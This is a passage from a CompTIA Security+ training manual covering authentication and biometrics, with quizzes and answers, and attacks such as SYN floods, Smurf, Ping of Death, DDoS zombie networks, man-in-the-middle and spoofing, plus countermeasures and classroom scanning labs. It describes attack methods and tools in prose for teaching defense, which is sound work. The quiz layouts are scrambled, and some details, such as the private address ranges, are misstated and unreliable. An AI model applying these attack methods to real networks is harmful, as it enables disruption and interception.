Although biometrics tends to be far more reliable in terms of authentication than other means, it is generally too expensive for everyday use by individuals. A more promising area of biometric usage, other than their traditional use in highly secure areas, is in authenticating large numbers of people over a short period. This might become especially useful when smart cards gain wider acceptance because people can hold their own biometric information (something they generally prefer for privacy reasons) and simply insert the card into a slot and use whatever biometric scanner is required to prove their identity. The use of biometrics to gain remote access to controlled areas is also expected to rise, as users fear of identity theft during password authentication increases. Currently, however, factors limiting dramatic growth in this area are the large number of vendors and the different standards available. There needs to be more standardization in the industry before many companies will be willing to invest in such new technologies. Those companies that do invest will only require users who have access to very sensitive information and applications to use biometric authentication. Even though a biometric might be very difficult, if not impossible, to duplicate, steal, or forge, the templates that hold biometric patterns that are compared to the actual person during the time of authentication are still held in servers, which must be both physically and electronically secure. If a hacker were able to gain access to the files that link information about a user with their biometric, he or she would be able to copy their own biometric templates into that system, give themselves authority to access sensitive areas, or simply prevent others who should be allowed from doing so.
228
Multi-factor authentication
There are three commonly recognized factors of authentication: Something you know, such as a password Something you have, such as a smart card Who you are (something about you), such as a biometric Multi-factor authentication requires that an individual be positively identified using at least one means of authentication from at least two of these three factors. When choosing which methods and how many factors to use to authenticate a person, its important to consider several implications of your choice. Each method of authentication has certain strengths and weaknesses and each, appropriately, requires people to exert a varying degree of time and effort to prove they are who they say they are. Adding additional factors of authenticity to your identification process decreases the likelihood that an unauthorized person can compromise your electronic security system, but it also increases the cost of maintaining that system. When deciding the degree of assurance you need about a persons identity, it is important to take into account both the cost of having an unauthorized person compromise your electronic security and the cost of having authorized people authenticate themselves before having access to the data and services they need on your network. As the cost of compromising your electronic security increases, so should your willingness to pay for that security, whether through the purchase and upkeep of hardware and software or through the expense of lost worker productivity.
229
F-1:
Understanding how biometrics work

1 Name four features that are measured using biometrics.
Answers might include:
Fingerprints Hand geometry Retinal and iris patterns Facial characteristics Handwritten signature
2 Biometrics is the most secure form of authentication because it relies on measuring: A B

C
What you know What you have Who you are
3 Which of the following circumstances can result in a false negative?

A
An authorized person is not authenticated An unauthorized person is wrongly authenticated An authorized person is authenticated but denied access to needed areas
B
C
4 Identify some of the benefits and drawbacks of using retinal scanning.

Benefits: Highly accurate, difficult to spoof, measures stable physiological trait Drawbacks: Difficult to use, relatively large device, expensive
5 Which of the following biometrics measures behavioral characteristics?

A
Handwritten signatures Iris scanning Fingerprints Voice
B C
D
230
Unit summary: Authentication

Topic A In this topic you learned how the AAA model (authentication, authorization, and accounting) is applied to achieve security goals. You learned some techniques for creating strong passwords and storing them securely. You also learned how to modify the Windows Server 2003 local security policy to harden the system against attacks. In this topic, you saw how Kerberos provides a secure and convenient way for individuals to gain access to data and services through the use of session keys, tickets, authenticators, authentication servers, ticket-granting tickets, ticket-granting servers, and cross-realm authentication. In this topic, you learned about CHAP. You learned that CHAP provides a way for an authenticator to authenticate a peer using an encrypted challenge-and-response sequence. In this topic, you learned about private and public keys, digital certificates, and digital signatures. You learned how private and public keys and digital certificates authenticated by a trusted third party allow individuals and organizations to communicate with each other in a secure way. In this topic, you learned how tokens allow individuals to use strong passwords when logging on to a computer or network system. In this topic, you learned that biometrics provide the strongest means of individual authentication because they rely on measurements of individual physical characteristics and behaviors.
Topic B
Topic C
Topic D
Topic E Topic F
Review questions
1 Which of the following best describes authentication? A The process of gaining access to resources B The process of utilizing resources
C
The process of verifying the identification of a user
D The process of assigning permissions to users 2 What is the advantage in removing the name of the last user to log on? A Allows users to share computers B Requires users to remember their usernames
C
Requires a hacker to take an extra step when cracking passwords
D Hides the identity of the Windows Domain
Authentication 3 Why is password length important? A Longer passwords are impossible to hack
B
231
Longer passwords are harder to hack
C Windows requires long passwords in a domain environment D Longer passwords can prevent password cracking programs from working properly 4 What is the password length recommended by most security professionals? A Six or more characters B Five or more characters C Eight or more characters
D
Seven or more characters
5 Why are complex passwords important? (Choose all that apply.)

A
Complex passwords are more difficult to crack
B The complexity of passwords adds to the security of long passwords C Complex passwords are impossible to crack
D
Complex passwords help users create strong passwords
6 Which of the following is considered a complex password? (Choose all that apply.)
A B
@1c4htj3 Pa$$w0rd
C ncdjszkjdnc
D
Ajd649sg
7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or false?
False: CHAP stands for Challenge Handshake Authentication Protocol.
8 Which of the following is not a part of the CHAP authentication process? A The authenticating server compares the value it receives from the peer with the hash value it expects by calculating its own expected hash value.
B
The peer sends a challenge message to the authenticating server.
C The peer creates a variable-length value using a one-way hash function on a fixed-length input message. D The authenticating server issues new challenge messages to the peer at random intervals throughout the communication session. E The CHAP authentication process starts after the authenticating server tells the peer that CHAP will be used.
232
CompTIA Security+ Certification 9 There are many different password conventions; what are basic rules to follow in order to safeguard your passwords. (Choose all that apply.)
A B C D E
Passwords must be memorized. If they must be written down, the written records must be locked up. Each password you choose must be different from any other that you use. Passwords must be at least six characters long, and probably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase), numbers, and other characters, such as %, !, or &. Passwords must be changed periodically.
10 Kerberos assumes that none of the workstations or servers is physically secure and that bad guys can position themselves between the user and the service being sought. True or false?
False: Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought.
11 In a Kerberos system, after a client has received a ticket from an authentication server, it creates and adds an authentication that contains the users username and time stamp. True or false?
True
12 The authenticator in a CHAP session must return either a success or failure message to the sender once it has compared the expected hash value to the actual hash value. True or false?
True
13 Explain the difference between symmetric and asymmetric encryption.

In symmetric encryption, one key both encrypts and decrypts a message, and in asymmetric encryption, one key is used to encrypt the message and a different key is used to decrypt it.
14 An active token is a device that creates and shares modified or encrypted forms of the base key. True or false?
True
15 One-time passwords are vulnerable to which of the following attacks?

A B
Phone line redirection attacks IP theft
C Dictionary attacks
D
Man-in-the-middle attacks
Authentication 16 Which of the following is an example of a biometric? (Choose all that apply.) A Complex passwords
B C
233
Fingerprints Retinal scans
D Smart cards 17 A biometric that involves the measurement and analysis of different hand characteristics and measurements is called: A Fingerprints B Facial recognition
C
Hand geometry
D All of the above 18 A biometric that involves analyzing voice characters and measurements is called: A Voice-to-print technology B Facial recognition C Sound technology
D
Voice authentication
Independent practice activity

RunAs allows an administrator to log on with a standard user account and still run administrative programs with administrative rights. Those rights are only applied to the application, so viruses, worms, and Trojan Horses cannot access the network with administrative privileges. 1 Log on as User2. 2 Click Start, then choose Control Panel. 3 Double-click Local Security Policy. The User2 account should not be able to edit the Local Security Policy. Click OK. 4 Right-click Local Security Policy. Click Run As. 5 Select The following user. Enter the necessary administrator account information, and then click OK. You can now edit the local security policy. 6 Which of the following is an advantage in using the RunAs command? A Allows users to bypass security without permission B Helps prevent the spread of viruses C Conserves resources for administrators
D
Allows administrators to check e-mail and administer the network
234
CompTIA Security+ Certification 7 Which of the following is a disadvantage of the RunAs command? (Choose all that apply.) A Opens potential security holes
B C
Allows users to install applications if they know the local administrator password Allows users to access administrative tools if they know the local administrator password
D Allows users to change account permissions 8 How can you use RunAs on an existing shortcut? A Hold down the Alt key and right-click the shortcut B Right-click the shortcut
C
Hold down the Shift key and right-click the shortcut
D Hold down the Ctrl key and right-click the shortcut 9 What application should you not use RunAs to execute? A A virus scanner B An e-mail application
C
A word processor
D An auditing program 10 How can you prevent users from using RunAs? A Delete the RunAs command
B
Disable the RunAs Service
C Disable the Server Service D Delete the RunAs.dll file
31
Unit 3 Attacks and malicious code

A Recognize and defend against denial-of-
service (DoS) attacks, including SYN flood, Smurf, Ping of Death, and Distributed Denial of Service (DDoS) attacks.
B Identify man-in-the-middle attacks. C Recognize the major types of spoofing
attacks, including IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
D Discuss replay attacks. E Explain TCP session hijacking. F Detail various types of social-engineering
attacks, and explain why they can be extremely damaging.

G List the major types of attacks used against
encrypted data.
H List the major types of attacks used against
encrypted data.
32
Topic A: Denial of service attacks

# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk DOS / DDOS (Denial of Service / Distributed Denial of Service)
1.4
Introducing denial of service attacks

Explanation A denial-of-service (DoS) attack is any attack that consumes or disables resources in order to interrupt services to legitimate users. The objective of the DoS attack is to disrupt normal operations, but not destroy or steal data. This causes inconvenience at best, diminished revenue and reputation for the victim at worst. DoS attacks represent a major problem to security administrators because they take numerous forms, are very common, and can be very costly to the attacked businesses. A wide range of attack tools are available that allow malicious users to attack systems of all sorts, and many of the tools have easy-to-use graphical user interfaces. A DoS attacker need not have deep knowledge of networks or systems in order to launch a damaging attack, because many of the attack tools require only basic computer knowledge to operate. Modes of attack include: Causing an application or operating system on a victims computer to crash, making it unusable to legitimate users. Clogging network connections to a Web server with illegitimate traffic, slowing the users traffic down, or making it completely unable to reach the Web site. Overloading the victim system by consuming resources such as disk space, bandwidth, buffers, and queues. An overwhelmed system might offer its users very sluggish performance or might be completely unusable. Using the normal behavior of a system to deny access to its users. For example, an attacker could cause a user to be locked out of a given computer by attempting to log on to the system with an incorrect password three times. Many computer systems lock out a users account for a preset time period after the third failed logon attempt. Remotely causing a network device to crash, temporarily making the network inaccessible to attached devices. Overwhelming a DNS server with lookup requests until it runs out of memory and crashes, making it impossible to resolve addresses for the domains it serves, and thereby interrupting access to any Web pages within the domain. Security administrators should be familiar with the more common DoS attacks in order to secure their networks and systems from such attacks. A representative sampling of attacks is presented in the following sections.
33
SYN flood
A SYN flood attack prevents users from accessing a target server by flooding it with half-open TCP connections. Normal TCP connections between two hosts are arranged with an exchange of three packets. 1 The first packet is sent from the client to the server with the SYN flag set. 2 The server acknowledges the session by replying with a packet that has both the SYN and the ACK flags set (a SYN/ACK packet). 3 The client responds to the server with an ACK packet. The TCP session is completely established and the two hosts are able to exchange data. If, for some reason, the client doesnt complete the connection by sending the ACK packet, the server waits a couple of minutes, giving the client plenty of time to respond, before clearing the uncompleted connection from memory and making it available for use by others. The TCP session setup process is shown in Exhibit 3-1.
If students question what the abbreviations in the Exhibit mean: SEQ is the packet sequence number, CTL is the control flag, SYN is the synchronize control flag, and ACK is acknowledgement. More information about threeway handshakes can be found in RFC 793.
Exhibit 3-1: TCP three-way handshake Although most computer systems can handle many established network connections, they usually can handle only a handful of connections that are in the process of being established (or half-open connections). This is because connections are usually set up in such a short amount of time that there is no need for a long queue for half-open connections. Conducting SYN flood attacks An attacker can render a machine unavailable to network users by filling the half-open connections queuewithout permitting the connections to be completed and moved into the list of fully open connections. This is accomplished by flooding the server with SYN packets that have a spoofed source address. The server responds with an SYN/ACK packet to the fake source address, but never receives the ACK reply, which is needed to complete the TCP connection. The server cannot accept any more TCP connections until the half-open connections time-out, so legitimate users can be prevented from reaching the server.
34
CompTIA Security+ Certification Countermeasures Many commercial firewall products have features to reduce the effect of SYN floods. The firewall sits between the attacking client machine and the attacked server, so it has the ability to withhold or insert packets into the data stream as necessary to thwart SYN floods. One strategy used by firewalls is to immediately respond to the servers SYN/ACK packet with an ACK that uses the spoofed IP address of the client, as shown in Exhibit 3-2. This permits the server to move the session out of the half-open connections queue. If the connection is a legitimate one, the client shortly responds with its own ACK packet, which the firewall can forward to the server with no negative impact. If the connection is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall can safely kill the TCP session by sending the server an RST (reset) packet. This is just one example of how firewalls can mitigate the effect of SYN floods; every firewall manufacturer has its own strategy. Other countermeasures include: Increase the size of the servers half-open connection queue. Decrease the queues time-out period, limiting the number of half-open connections from a single IP. Use network-based intrusion detection systems that can detect SYN floods and notify administrators.
Exhibit 3-2: Defending against the SYN flood SynAttackProtect You can protect your server from SYN floods with the TCP/IP parameter SynAttackProtect. This parameter is used to enable SYN flooding attack. A value of 1 enables this if the TcpMaxConnectResponseRetransmissions value is at least 2. This protection detects SYN flooding and then reduces the time spent on server connection requests that can't be acknowledged. This entry can be added to Windows Server 2003 through Regedit.
Attacks and malicious code Do it!
35
A-1:
Protecting against SYN flood attacks Heres why

Setting the SynFloodAttack parameter in the Windows registry makes a Windows NT, 2000 or Server 2003 network more resistant to SYN flood attacks.
Heres how
1 Log on to the Windows Server 2003 server as Administrator
2 Click Start 3 Choose Run Enter regedit Click OK 4 Expand

HKEY_LOCAL_MACHINE To open the Registry Editor window.
5 Expand SYSTEM 6 Expand CurrentControlSet
7 Expand Services 8 Expand Tcpip 9 Select Parameters 10 Right-click Parameters 11 Choose New, DWORD Value
Enter SynAttackProtect
36
CompTIA Security+ Certification 12 Right-click SynAttackProtect Choose Modify 13 In the Value Data field, enter 1 Click OK 14 Close the Registry Editor window
A value of 1 enables the parameter. To start the process of changing the parameter value.
37
Smurf
Explanation Smurf is a non-OS specific attack that uses a third-partys network segment to overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets. As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary network (preferably, with numerous hosts), and the victim (typically, a computer or router on the Internet). 1 The hacker sends a ping (echo-request) packet to the intermediary networks broadcast address. The packets source IP address is faked to be that of the victim system. 2 The ping was sent to the broadcast address of the intermediary network, so every host on that subnet replies to the victims IP address. 3 The third-partys hosts unwittingly deluge the victim with ping packets. Using this technique, the hacker cannot only overwhelm the computer system receiving the flood of echo packets, but can also saturate the victims Internet connection with bogus traffic and therefore delay or prevent legitimate traffic from reaching its destination.
Exhibit 3-3: Smurf attack Countermeasures Protective measures against Smurf attacks can be placed in the network or on individual hosts. Configure routers to drop ICMP messages from outside the network with a destination of an internal broadcast or multicast address. Configure hosts to ignore echo requests directed to their subnet broadcast address. Most current router and desktop operating systems have protection in place to guard against well-known Smurf attacks by default, but changes to the configuration or new modifications of the attack might make the network and hosts vulnerable.
38
Ping of Death
There are a number of attacks that exploit some operating systems incorrect handling or error checking of fragmented IP packets. The Ping of Death is a well-known exploit that uses IP packet fragmentation techniques to crash remote systems. When first released, this shockingly simple attack had the ability to crash any machine that could receive a ping packet. All the attackers needed to use in this attack was the victims IP address! Mode of attack
Explain the nature of IP packets and the concept of the MTU. You can explain an MTU by using a floppy disk analogy. If you want to transfer 5MB of information from one computer to the other using a floppy disk, you will have to split the information up into chunks small enough for the floppy to handle and then reassemble the data on the other computer.
This common exploit misuses the way that large IP packets (or more specifically, ICMP packets, because the attack uses a ping) are transmitted across networks. The maximum size of an IP packet is 65,535 bytes, but packets that are large cannot be transmitted on many network topologies. For example, the maximum transmission unit (MTU) for Ethernetprobably the most commonly used LAN topologyis only 1500 bytes. To transmit a large IP packet across a LAN, hosts and routers fragment IP packets into smaller Ethernet frames, and then reassemble the fragments at the destination. Each fragment contains an offset value that tells the receiving host where to insert its data into the reassembled packet. In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the victim, fragment by fragment. With each fragment, the size of the reassembled ping grows to near the 65,535-byte size limit of the IP packet. When the final fragment arrives, its offset value forces the packet to grow beyond the IP size limit, causing the victim host to crash. Countermeasures What made this attack particularly problematic was that recent Windows operating systems allowed the generation of nonstandard pings from the regular user command line, but the same systems would die when presented with one of these packets. Most manufacturers have now provided patches that make their systems invulnerable to the Ping of Death and other types of IP fragmentation attacks. Starting with Windows 2000, Microsoft has removed the ability to generate ICMP packets of invalid size by setting the maximum packet size to 53,000 bytes.
39
A-2:
Discussing DoS attacks

1 A SYN flood exploits the nature of the TCP three-way handshake. True or false?
True
2 The SYN attack inhibits services by which of the following? A B

C
Flooding a host with ICMP messages Transmitting excessively large IP packets Filling the half-open connection queue with bogus connections Overwhelming a DNS server with lookup requests
3 What are some ways to defend against Smurf attacks?

Set filters on firewalls and routers to drop ICMP messages. Configure hosts to ignore echo requests directed to their subnet broadcast address.
4 How can you defend against Ping of Death attacks?

Limit ICMP packet size. Install the latest security patches on your clients and servers.
310
Distributed Denial-of-Service attacks

Explanation A distributed denial-of-service (DDoS) attack is a network attack where the attacker manipulates multiple hosts to carry out a DoS attack on a target. It usually results in the temporary loss of access to a given site and an associated loss in revenue and prestige for the victim. The tools are automated, so a script kiddie (a malicious person on the Internet who is able to use automated attack tools but has limited technical understanding of how they work) can execute DDoS attacks. They are easy to launch, are extremely effective, and have become the tool of choice for malicious hackers targeting government and business Internet sites. Setting up DDoS attacks As shown in Exhibit 3-4, the first step in setting up a DDoS assault is for the attacker to compromise a machine to be used as a handler.
Exhibit 3-4: Distributed denial-of-service attack This is typically a large machine with plenty of disk space and a fast Internet connection, so the malicious hacker has the resources necessary to upload an exploit toolkit. Its important that the hacker go undetected on the handler machine, so hosts with a large number of user accounts or inattentive system administrators are targets for use as handlers. Once the handler has been setup with the necessary software tools, it begins to use automated scripts to scan large chunks of ISP address space (DSL and cable customers making the best targets because of their bandwidth and constant connection) to find hosts to use as agents, or zombies. The scripts used for this purpose generally target specific, known vulnerabilities in Windows operating systems and can complete the task of compromising each system and uploading the zombie software within a matter of seconds. The software is transparent to the machines owner, as it is imperative to the attacker that their tools go undetected.
311
Hundreds or thousands of zombies might be required to launch a successful DDoS attack, because most major Web sites have sufficient bandwidth and server resources to handle substantial amounts of network traffic. This is not an obstacle for the determined script kiddie, as the ever increasing number of unprotected home PCs connected to the Internet provides ample fodder for creating a large army of zombies. Conducting DDoS attacks The agent software on compromised hosts usually communicates with the handler machine via Internet Relay Chat (IRC) connections. These hosts are automatically logged on to an IRC channel where they passively wait for attack orders from the handler machines. When the malicious hacker is ready to launch the attack, a command is issued through the handler machine to the thousands of agents connected to the channel. Depending on the type of agent software installed, the attacker has a number of attack types to choose from, as listed in the following table:
Tools If students are unfamiliar with UDP explain that it is a connectionless protocol often used for network broadcast messages. Trin00 Tribe flood network Stacheldracht and variants TFN 2K Shaft More information about Trinity can be found at www.ciac.org/ciac/ bulletins/k-072.shtml Mstream Trinity, Trinity v3 Flooding or attack methods UDP UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN combo Stream (ACK) UDP, SYN, RST, Random Flag, ACK, Fragment
When the attacker is ready to launch the attack, the zombies are remotely instructed to flood the victim networkwhich they do without the machines owners ever being aware that their computer has been compromised. For an account of a DDoS attack, and the hackers methods and objectives, see Steve Gibsons account at http://grc.com/dos/grcdos.htm.
312
CompTIA Security+ Certification DDoS countermeasures The following table outlines actions you can take to safeguard your network against DDoS attacks.
Equipment Clients and servers Action Install the latest security patches from your software vendors. Install and configure personal firewalls on desktop PCs. Install antivirus software and maintain up-to-date signatures. Perform regular hard disk scans with the antivirus software. E-mail servers Install antivirus software on all mail servers, both internal and external, to protect the network from e-mail worms. Filter packets coming into the network destined for a broadcast address. This can help to prevent your network from being susceptible to the Smurf attack. Turn off directed broadcasts on all internal routers. This also internally prevents a Smurf attack. Block any packet from entering your network that has a source address that is not permissible on the Internet. This type of address would include RFC 1918 address space (10.0.0.0, 172.16.24.0, and 192.68.0.0), multicast address space (224.0.0.0), and loopback addresses (127.0.0.0). Block any packet that uses a protocol or port that is not used for Internet communications in your network. Block packets with a source address originating inside your network from entering your network. Block packets with fake source addresses from leaving your network.
Inform students that a detailed discussion of firewalls will be offered later in the course.
Firewalls and routers
313
A-3:
Scanning for zombies Heres why

DDOSPing is a detection utility that scans for the most common DDoS programs. This tool will detect Trin00, Stacheldraht, and Tribe Flood Network programs running with their default settings. A download link for this software is provided at http://www.foundstone.com/ knowledge/proddesc/ddosping.html.
Heres how
See the classroom setup instructions for the location of the download file.
1 Download the DDoSPing software according to your Instructors directions
2 Extract the program into

C:\Security
3 In Windows Explorer, go to C:\Security and double-click

ddosping.exe
The DDoSPing window appears.
4 Under Transmission speed control, move the slide bar to

max
Limit the range of IP addresses to classroom PCs. This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.
5 Under Target IP address range, enter the range specified by your Instructor
This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.
6 Click Start
The scan will take a few seconds to complete. Wait until the Program stopped message appears. To determine whether the system is infected. If no names appear in the Infected Hosts section and in the Status section, Zombies detected is 0, your system is clean.
7 Review the Infected Hosts and Status sections
8 Close the DdoSPing window
314
Do it!
A-4:
Discussing DDoS attacks

1 Which of the following are DDoS tools? A B C
D
Trin00 Trinity Mstream All of the above
2 List three countermeasures you can implement to protect clients and servers from DDoS attacks.
Install the latest security patches Install and configure personal firewalls on desktop PCs Install antivirus software and maintain up-to-date signatures Perform regular hard disk scans with the antivirus software
3 Number the steps to launch a DDoS attack in the proper sequence. ___ Zombies log onto IRC channel to communicate with the handler ___ Zombies flood the victim network ___ Attacker compromises machine to be used as a handler ___ Handler uploads the zombie software ___ Handler scans for hosts to use as agents or zombies ___ Handler launches attack
3 5 4 1 6 2
315
Topic B: Man-in-the-middle attacks

# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Man in the Middle
1.4
The purpose of man-in-the-middle attacks

Explanation Man-in-the-middle refers to a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session. The key to this concept is that both hosts think they are communicating with the other, when they are in fact communicating with the attacker, as shown in Exhibit 3-5.
Exhibit 3-5: Man-in-the-middle attacks
316
CompTIA Security+ Certification Man-in-the-middle attacks have a variety of applications, including: Web spoofing This is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. In this case, the attacker can monitor and record the victims online activity, as well as modify the content being viewed by the victim. TCP session hijacking By arranging for traffic between two hosts to pass though his machine, an attacker can actually take over the role of one of them and assume full control of the TCP session. For example, by monitoring a victims communications with an FTP server, the attacker can wait for the victim to authenticate and then hijack the TCP session and take over the users access to the FTP server. Information theft The attacker can passively record data communications in order to gather sensitive information that might be passing between two hosts. This information could include anything from industrial secrets to username and password information. Many other attacks, including denial-of-service attacks, corruption of transmitted data, or traffic analysis to gain information about the victims network.
Conducting man-in-the-middle attacks

Man-in-the-middle attacks can be accomplished using a variety of methods; in fact, any person who has access to network packets as they travel between two hosts can accomplish these attacks: ARP poisoning Using Hunt, a freely available tool that uses ARP poisoning, an attacker can monitor and then hijack a TCP session. This requires that the attacker be on the same Ethernet segment as either the victim or the host with which it is communicating. ICMP redirects Using ICMP redirect packets, an attacker could instruct a router to forward packets destined for the victim through the attackers own machine. The attacker can then monitor or modify the packets before they are sent to their destination. DNS poisoning An attacker redirects victim traffic by compromising the victims DNS cache with incorrect hostname-to-IP address mappings. Countermeasures To protect against man-in-the-middle attacks, routers should be configured to ignore ICMP redirect packets. Countermeasures for ARP and DNS poisoning will be examined in the following discussion of spoofing techniques.
317
B-1:
Reviewing man-in-the-middle attacks

1 Define man-in-the-middle attacks.
This is a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session.
2 TCP session hijacking is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. True or false?
False: Web spoofing does this
3 State three goals for man-in-the-middle attacks.

Monitor and record a victims online activity Modify information presented to a user Hijack a session Gather confidential information
318
Topic C: Spoofing
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Spoofing
1.4
Spoofing types
Explanation Spoofing is pretending to be someone else by imitating or impersonating that person. When you present credentials (for example, a username/password, hostname, or IP address) that are not yours in order to gain access to a network, then you are spoofing that system. This is much like presenting a fake drivers license to illegally buy alcohol or presenting fake credentials to appear as a law enforcement official. Four primary types of spoofing are issues for the information security professional: IP address spoofing ARP poisoning Web spoofing DNS spoofing
IP address spoofing
IP address spoofing gains access to a victim by generating TCP/IP packets with the source address of a trusted host. The attacker uses this deception to bypass filters on routers and firewalls and gain access to network resources. The sequence of events for an attack that uses IP spoofing is described below and pictured in Exhibit 3-6. 1 The attacker identifies a target, the victim of the attack, and a machine that is trusted by the victim. The attacker disables the trusted machines ability to communicate by flooding it with SYN packets. 2 The attacker uses some mechanism to determine the sequence numbers to be used by the victim. This could involve sampling packets between the victim and trusted hosts. The attacker spoofs the source IP address of the trusted host in order to send his or her own packets to the victim. 3 The victim accepts the spoofed packet and responds. Although the network infrastructure automatically routes the victims reply packets to the trusted host, the trusted host is unable to process the packets because of the SYN flood attack against it. 4 Blind to the victims response, the attacker must guess its contents and craft an appropriate response, again using a spoofed source address and a guessed sequence number.
319
Exhibit 3-6: Filtering spoofed packets Challenges There are three primary challenges faced by the attacker using IP address spoofing. 1 Although the hacker can craft packets that can be routed via the Internet, past the firewall, to the victim, the perpetrator cannot cause the return packet to be delivered back to his or her machine. This is because the network automatically routes the reply packet to the trusted host. In such a case, the hacker is flying blind and cannot hear the victim hosts responses. 2 The victims reply packets are automatically delivered to the trusted host by the network infrastructure. If the trusted host the hacker is spoofing responds to the packets that it is receiving from the victim, it could interfere with the scheme. To prevent this from happening, the hacker needs to DoS the trusted host to keep it from responding to the victims packets. This can be accomplished with an SYN flood. 3 This hurdle is perhaps the most difficult to leap: in order for the victim host to accept the spoofed packets from the hacker, the packets must have the correct sequence number. The initial sequence number (ISN) is provided by the victim host as part of a session setup. Remember that the hacker cannot receive any packets back from the victim during the spoofed session. The hackers ability to craft packets with the correct sequence numbers (which are therefore accepted by the victim) is reliant upon the hackers ability to narrow the ISN down to an acceptable range, and to predict subsequent sequence numbers based on knowledge of the ISN and the victims algorithm for determining subsequent sequence numbers.
320
CompTIA Security+ Certification Countermeasures To prevent IP spoofing, disable source routing on all internal routers. Also, filter out packets entering the local network from the Internet that have a source address of the local network.
Do it!
C-1:
Scanning IP addresses Heres why

(Follow your Instructors directions.) Foundstones SuperScan is a powerful connectbased TCP port scanner, pinger, and hostname resolver. A download link for this software is provided at www.foundstone.com/knowledge/ proddesc/superscan.html.
Heres how
See the classroom setup instructions for location of the download file.
1 Download the Foundstone SuperScan software
2 Unpack the program into

C:\Security
3 In Windows Explorer, go to C:\Security and double-click

SuperScan4.exe
Limit the range of IP addresses to classroom PCs. This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.
The SuperScan window appears.
4 Under IPs, enter the IP address range specified by your Instructor
5 Click the right arrow key next to the IP address range 6 Click the blue Start arrow 7 Review the results 8 Based on the results of the scan, which IP Addresses are in use?
To add the address range as the range to be scanned. To start the scan.
Answers will vary. Notice that the IP address of the host performing the scan is not included in the list. This is because no ports are open on the host performing the scan and by default; hosts without open ports aren't listed. This type of information is very useful to hackers.
9 Which ports are open on those systems? 10 When you are done viewing the scan results, close the application window
321
ARP poisoning
Explanation ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a hosts ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack can only be carried out when the attacker is connected to the same local network as the target machines. Operation ARP operates by sending out ARP request packets. An ARP request broadcasts the question, Whose IP address is x.x.x.x? to all computers on the LAN, even on a switched network. Each computer examines the ARP request and checks if it is currently assigned the specified IP. The machine with the specified IP address returns an ARP reply containing its MAC address. To minimize the number of ARP packets being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association. ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a target computer could be convinced to send frames to the attackers PC instead of the trusted host. When done properly, the trusted host will have no idea this redirection took place. Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect transmission, or to simply intercept packets. Countermeasures To stop ARP poisoning, use network switches that have MAC binding features. Switches with MAC binding store the first MAC address that appears on a port and do not allow the mapping to be changed without authentication.
Web spoofing
A Web spoofing attack convinces its victims that they are visiting a real and legitimate site, when they are in fact visiting a Web page that has either been created or modified by the attacker for duping the victim. The attacker can then monitor or modify any data passing between the victim and the Web server. Web spoofing attacks come in two flavors: Man-in-the-middle attacks Denial of Service attacks Man-in-the-middle attacks In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to point to the attackers Web server rather than a legitimate server. This is accomplished using automated URL editing tools. Assuming the attackers server is on machine www.attacker.net, the attacker rewrites each URL to begin with http://www.attacker.net/. The link http://newspaper.com becomes http://www/attacker.net/http://newspaper.com.
322
CompTIA Security+ Certification When the victim clicks on the revised URLs, the browser requests a page from the attackers server, which then requests the page from the real server. The attackers server revises the pages URLs before providing the edited version to the victim. Using this method, every page on the World Wide Web can be altered to pass through the attackers server, as shown in Exhibit 3-7.
Exhibit 3-7: Web spoofing Denial of Service attacks Another form of Web spoofing displays a false, but convincing Web page to the victim with the objective of obtaining confidential information or providing false information. The Web page mimics a legitimate Web page, but the content is altered to redirect communications from the intended site to the attackers server. To see some examples of Web spoofing, visit the following page:
http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/
Demonstrate the Web spoofing examples.
Countermeasures To defend against Web spoofing attacks, do the following: Disable JavaScript, ActiveX, and Java in the browser. The attacker will be unable to hide the evidence of the attack. Display the browsers location line. Instruct users to watch their browsers location line for any dubious URLs. Instruct users to set their homepage to a known secure Web site.
DNS spoofing
DNS spoofing manipulates the DNS server to redirect users to an attackers server. The DNS server resolves Internet domain names (www.security.net) to IP addresses (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS spoofing can alter the cache so that www.security.net, which normally translates to an IP address of 203.123.12.10, is redirected to 186.120.0.40.
Attacks and malicious code DNS spoofing is accomplished in one of three ways:
323
